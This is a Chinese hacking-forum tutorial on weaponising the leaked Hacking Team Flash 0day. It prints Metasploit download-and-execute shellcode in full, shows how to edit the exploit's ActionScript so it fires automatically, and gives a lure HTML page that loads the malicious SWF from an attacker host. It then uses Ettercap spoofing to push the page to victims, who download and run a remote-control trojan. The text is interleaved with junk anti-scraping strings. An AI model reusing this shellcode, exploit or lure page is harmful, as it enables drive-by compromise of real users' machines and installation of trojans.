中国网络渗透测试联盟

标题: flash 0day之手工代码修改制作下载者实例入侵演示 [打印本页]
作者: admin    时间: 2018-10-20 20:28
标题: flash 0day之手工代码修改制作下载者实例入侵演示

* w' V: r e2 V# d( O: {6 m; K 三、flash 0day之手工代码修改制作下载者实例入侵演示 ! W& q# u& O$ q

# j) I* O3 b) P, J

/ d6 n' p, B$ \& T 利用到的工具: ( K6 _$ J3 ]2 C! h. Q3 D

3 z" o$ A" e, s" l# P

2 a" [' \, n9 J0 p) `5 W0 V; p1 ` Msf 4 B! }4 {3 }% |, m3 p' c

3 ]5 o) O7 t- Q7 D% c c+ M

4 n9 r$ B4 H% g' C+ j6 g Ettercap 8 g/ A% Q3 \1 l0 L6 B% p+ t

4 B/ r1 A" U. \1 j

* ?# s! l) B& ?! ?. Y Adobe Flash CS6 # K' H( Y t# j/ c

4 J; @% K: ~4 b2 ], `

% B, k" G) R4 ~" S* h Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 $ {; V- W) m2 }9 l+ `: T4 V7 t7 K

9 H& a. U" O) h* ?& Q

. G; C( v2 @1 ?) u, W 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options + X, b+ O$ d8 |8 e7 E6 Y- z/ J( Y

8 r# ?- w& |" u

0 E8 n- l- h* f) [- o0 ?! t# j4 e1 X 如图: : y- O( r8 m7 d& m5 [9 ^

( ^" L8 a) z5 S4 T; m; E

# y( ~, N* _) v4 @- Q/ H, d, u   + {! j" K, r; y* g$ i2 |& h" M4 m

# ~) j# C" L1 `' F( g

, b E6 O( s' M8 K \8 _4 ]   - U2 t0 }1 n4 f0 M4 C% i

' |$ i- J( P& f4 C8 m, E* O+ l

" X6 ^; s& i6 z 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: . y; T; \* f" c- f; g# L+ o

) X6 v$ p9 H! {+ m

$ R2 s' |% k$ r% Y. T   ! j9 P* S9 M; `% R/ h' }" q

/ v, G) y/ S8 u* e: t5 h

% l% l5 V8 ^ M3 ^3 A! v   3 l5 k) E+ ?0 [' p# F% J; `

- Z+ N2 M v+ g- }$ }

, R |& ?' Z# W& m5 { 然后执行generate -t dword生成shellcode,如下: 8 s! u5 J; g( Q- k0 m

3 d! W1 m' x) V, L9 Y2 \4 ~! w

9 G/ c; V, r* I% }8 j5 g   % i7 T$ j) O: u' Y2 Z$ Y

' Z3 Q4 G! r( h; \& W; `3 v9 W( @

$ w0 a0 J! [/ X; L* w 复制代码到文本下便于我们一会编辑flash exp,如下: * V4 W" A, x! ~+ W }* ^

" T; X/ n! y1 ?. Y

5 O5 [" H3 H# M6 [; { 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, : y4 N& d. X: [: c9 g0 Z; u

2 ~" [* K6 Z* ^2 J) Z0 U

& I; |! k% B1 ?) |+ a1 d+ \' k' V8 A3 M 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, : m) e7 p. {0 h. M5 k5 i; m) c

; H' t& W1 o! U: e* @. i

% V3 f3 c& \1 w" z# X 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, & Y) \2 o! l [# R9 A4 R% u/ C5 {

7 A0 I: d, \8 ?+ \0 R

( C) I$ A4 ], L9 Y+ Q 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 9 \) i2 H, V: X9 a, Y& E

# i8 ^7 ^% S- I4 `! w* y, B

% @0 D. t' i% V 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, % b4 R; l1 h$ E8 z% P* |# [. E

. K7 |5 T* R8 y5 f& g

5 M& Z/ O& S5 t# \- n! m5 Q 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 5 p1 }; y8 A1 C! D) J. z( f

8 _: A; \+ q6 C2 x

F, x% {( W' z' F, F, C+ n& E 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, . w7 O7 p# i, T! J. K+ H3 R$ ]- ~

7 D- i0 O8 S- D8 [+ V: p2 M% c |! m

9 B, ~: W" ]( }6 s$ m5 x 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 1 H: q8 \( }' O; q! O

; |6 D& V! Q. M+ Y! Y$ l

2 L# D' B! V2 |& V1 j: Y: N4 ~/ q 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, ( u. r6 l& F* g9 r8 {0 R

6 n. H- @4 `. Z

0 m: |1 z! X% \) _, e 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, & E, ~& Y# I# O% k5 }& r4 c* ]- L

" O- ]# I/ D) L) p' y

5 y0 A! U: q( Q$ `* y' o- T5 h 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ) S% Q$ ~! ~5 d" P ]# D

" i6 I4 B" `' r& l3 ]: o

/ A6 ~' ^% x; T 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ! R' o, ^1 i* |- d, a9 \

! Z- F- Q/ \" g9 b- O4 X) x

8 I, C4 q; u/ R; }8 t+ M) {9 E( s4 E 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, $ C) }5 c2 h1 c! J

: Q( j: `! E2 ~. w1 Z7 v

' M* F7 t( q1 F$ g" [% n 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ; J+ |4 X" ]- @, |

8 i1 L% x- u' k% F5 [* X' u

5 k' Z. Z& E7 t( K5 D) d   7 M: [6 X# H' h' z

( c0 W4 b- C# C7 V

" j+ T# U6 W, F. |$ g X   3 J; f$ ?. o) }3 J' X. d& R

7 t8 h+ v: _4 N4 e9 r* `

9 j d4 U* _# H4 B$ p 下面我们来修改flash 0day exp,需要修改三个文件,分别为: * n3 P- v8 U* L/ h. @. s

$ n4 ~9 Y: D* ?" |* V

; D& w/ F2 W/ _   1 w" D9 [ C# J) Y

, f$ y$ B& R( @/ V/ b' X- }5 Y

! p, a- r- O O4 s 先修改ShellWin32.as,部分源代码如图: , c8 l, S" X9 F$ f8 g m* l

6 O( R7 G1 Z+ j% n6 G; y

- Z( F, ^, g3 E; Q9 H z   . c2 n5 i+ h/ o7 t

, H+ j) c3 a0 L# D

5 D8 J* B' ~! n8 e; L 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 2 N) ]/ a! g, m0 a7 j+ \% c; ~- P

) n) d$ P5 y/ l. V) T2 q" @ }& t* n

/ {- e4 j* K3 ?% {1 }/ H   * i1 a0 c" g! Q5 J! _. {2 L+ j

7 K: f# C+ ~* m# t- _

+ b/ ] ^ q8 i, Q 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ' O+ N* _) Q Z2 l# p+ Z# D v' I) J

$ v. e9 I$ G' g

- i2 c% W2 a0 S- p2 H1 c   2 ^- h9 ?! E2 t# `3 H( p- F

7 W! q3 ^6 t* p* g

0 ]' F) B0 }, m5 p' K 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: : ?% b; r, X! m4 ?' z" g

5 g" k0 q6 Z" g2 a* L, @: g

, |, `; T% G5 M" p5 o+ _   ) a5 [) K1 h: G6 h5 @0 |$ Y$ b% E

8 v/ c2 m" `0 \8 \$ x

) r1 w% D, E9 X9 R6 @" j# d }8 d   ( P5 v# X. \) w) h- R" M1 o

2 ^# ?1 a) T4 Y

" V8 H- s$ {0 c0 I% ~: ~6 X   * Z2 ^/ q4 H5 h8 n! f0 }. Z; k

/ n& \) h% J8 j4 n7 M' t1 ]

, F& |& G' S: V2 t7 S- W* u" y 然后点保存,下面我们来编译一下,打开 . V- g& i( m+ s" Z. V f+ f

7 ]1 [2 h; @, ]4 l# Y4 r! e( a" L

* l' f0 p1 r' p! \. B; C exp1.fla然后点文件-发布,看看编译没错误 d$ Y' b6 Z7 z! M3 Z

1 c# k) k( r4 `9 P; g

4 Z" {+ p! G! o1 J' u. [( b! H3 O   % V& D; s/ ]2 I

& q3 h* F4 L% B

+ X0 [* D) L% [- K% r/ v   % E/ [ ~! D+ |9 X/ x6 j; W

' @9 r' r" c# Y/ _# q7 F! W& T" y

* C1 q" G( j' i+ y. O: g: `' c   6 S4 L4 \: ^* m m- v1 _

& O1 n y' T8 x! V" ~, }

" { K9 y. H4 \: x; o8 }6 D8 E   5 c3 S1 Z" i. @& ]

2 G5 Y" g. ~# E4 F, c- p2 T

m; [6 e- |% k% _) a6 d+ o$ |* \9 Y 然后我们把生成的 1 K8 b0 b! a7 t& ]( Y

/ s- C0 M$ `5 M# b0 ~& z. c6 v# D

/ J; Z" z& ]1 f% F' _ exp1.swf丢到kailinux /var/www/html下: ( O! O1 L2 L0 A& g- S& E

; q; a$ d% Z5 e

/ p0 o' N& E" b- [( W; i! I 然后把这段代码好好编辑一下 : |* Y; e3 v( S" E

+ j& S' r4 @4 Z! c1 v

# [, J- X7 R$ K; G+ n   9 o; r* O' t8 [. ^. O

2 |6 B8 J& F& w' z0 G2 \1 N: R

$ C* o; b- z! h   * A2 N$ x6 e# P0 v3 X3 Y, j

2 @' e0 t& E) w# @5 a: T$ S

7 W. p+ s7 t7 G$ p) g m7 w   + w) Q+ C* j4 s+ R

! A( f; g4 e" \2 e! X" \3 x

+ e$ C& W7 P; g* C! K* z" Y- n   # X% i& I" g1 _3 p, l2 @

: A3 L2 d$ M; `* R; R

2 x% X: m q* P7 f   2 D8 \# O2 b1 }; w3 R

! y8 P0 g/ |5 G" W8 C

( N3 B+ p, X; G   / k6 G2 l1 s' b$ ~) w. O3 ]9 Z

) A' U# [7 l: Z, [7 X, W4 `0 Q

8 ~6 J2 [; F& h }, H' } <!DOCTYPE html> 3 ~9 \! P! ]% ?

. D% F$ b+ w* `: P

% k. \$ M" O! b2 w d <html> ! f- F e- _' G: `3 ?

M! ~( b$ Y6 F& ?- {' U8 k. H" z3 t

: K5 }( a) R! H6 ?: C <head> $ o" S7 n7 h1 G# T

/ z# G, ]) y/ e0 u( G% T

* c9 B5 G! M. `' C; L4 @# k <meta http-equiv="Content-Type" content="text/html; 4 Q" N5 J5 @" \: h" b% u$ v! l

' N @, U- k" ^" g: [

: ]% f/ s' h* X) k/ p6 D charset=utf-8"/> ' Y: W {5 U# G7 m

, N. ?' } d8 Y4 H2 Z( E3 f

& u) n. ^2 {. B/ Q% v0 P6 ? </head> 7 _' u2 ?- ^3 f

, t+ D/ e& Y( ?9 u ]" Q: ^2 y

% m4 i+ X4 [$ `; ] O <body> ! I5 u* N: m3 Z c$ j

5 s( K& v; ]; G7 r/ g

& s' O P3 {3 Q h. k <h2> Please wait, the requested page is loading...</h2> - e4 X Z! L- ?! f ~8 `$ X/ R

0 u- J1 x' \* d3 {

& I% }: o, ?5 B+ s$ n <br> 3 c6 l9 p; }0 z* {0 x& g( w- I

- m: {3 Z) |+ s3 Y

( |' |# G3 A& m4 C5 X <OBJECT - \" _% {2 Y6 i

. h; E! ?4 _0 v, R) }

! M. U: _" N" P. W& ^3 ~, H classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie $ P/ Q+ ?+ ^8 @% V z N3 z2 ~# Y3 d3 f

* L. j* E% ~7 m& A8 Q; ]5 }4 R" ]/ l

9 b: E( W- R' Q V VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ( G1 Y, H- n3 O' }

0 J/ s% a- v4 o% ~% L$ B% N! U2 k! u

2 d+ q, o4 r/ A </body> + G9 s3 B0 W1 t# y. E9 m

( f; [" l6 l$ ~& {, N ~

* G! h' h t5 i$ B& i <script> 0 T" t$ i/ G `! s) ?/ F2 w& i

: b: F2 a- S+ Q# Z4 K

2 K v4 f* x/ q% n     setTimeout(function () { ) d6 i1 Q: {2 H O& v

# i4 h* W% ?- x" V( U

! S( R" z6 i! _8 |! R9 |          8 @% Y& B6 O) P

3 Y+ p! n/ N" _$ Y* W- u8 s

% i( S! ^0 H4 ]# q) h# m9 K window.location.reload(); $ t; I, A; N$ i; w" X

1 q! D* }: i+ u3 L; v

- O1 i' U( X( R. f' g( l! x" ^     }, 10000); : V0 M! n% Z7 a6 r. P

) W3 z: t) D/ F( j: z

1 q+ H# r& U! K   7 `$ y" z; r5 O1 @1 S1 r3 p8 s

; P' H3 \- i$ N0 z8 N2 U/ D5 {

) X: C' G0 d7 T' f; b </script> ! R$ r) U- G' O, {' Q% b* ]

- d+ O7 Z8 I* Q2 H m; h

& j! }# p, _) S, B3 H </html> 6 Q& h6 n9 u* S2 i

; ?! ]' R6 L3 V6 ]1 n

" S+ G8 c/ f7 V% `" G- s   - W5 t3 _3 b4 C: J# ~

% ?2 M) P; W, B" l

$ l8 t1 t( _) T; y |+ \. F- x 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 2 V- L' x$ u9 i- f. m( k

% W# N8 q2 L0 ]) X9 B% l) k

' C+ Y! S4 Y+ f6 F   0 L& S9 h; }5 b3 z% i+ I

7 |' [. Q/ I2 `

7 ~' [; V$ L8 N/ E4 U+ y" Q5 D- c a% m   i8 F" b8 y( W7 P

: \' K# o8 ^ R# G' T

! W' Y2 B3 Z( ]$ t; ]( d   " K- t" s! z% d0 Z0 @3 n

+ `8 r3 b& J* \1 D

* R& K2 H* H N- M: p# H   7 f8 [6 a' P* ?0 x9 K

: t( n& C6 v2 e+ s% w) z+ v9 D

# A" s8 {6 k5 s3 J, o   + U7 g& X" L9 S7 N# S! u1 h

# @9 }9 s- H+ P* M

: \' \5 A5 ]2 |" A. } 下面我们用ettercap欺骗如图: ( t3 \6 {/ x5 X, `: q: [

{! U6 h7 \- e$ P# o

* y: V M- `; F& S   ( Q8 i" D+ v' K. i$ O8 |- q

. t+ D( {. ^# W# \5 [# T4 v

, q# T$ w+ c/ b, x   ! c! X0 W0 i2 | w

4 _: Y$ W8 \* H- u @

0 Q! ]. G" t* n" E' X0 \5 y 下面我们随便访问个网站看看: ; [, |" I q0 j

" \- k& C3 l% x

% {6 n/ g) R* v9 j* e" _4 b" Q- C( y 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 8 N& n0 @% r3 j* ^7 F6 N* T( G

3 S& H. H( W4 W4 l B

9 `5 g; D$ }# t* N   , }& M" H2 C* |( p1 K+ Y

2 ^4 H( R; [# H2 I

$ L7 s' { m6 E& z( t4 ] 我们看另一台, & f0 e0 J" V8 d

9 K, U5 j9 L# U1 E" n: ]4 v/ |

C7 d( x$ {+ A9 w! b 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 ! _& p! i$ n) t) V. \ z- R* q4 x: `





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2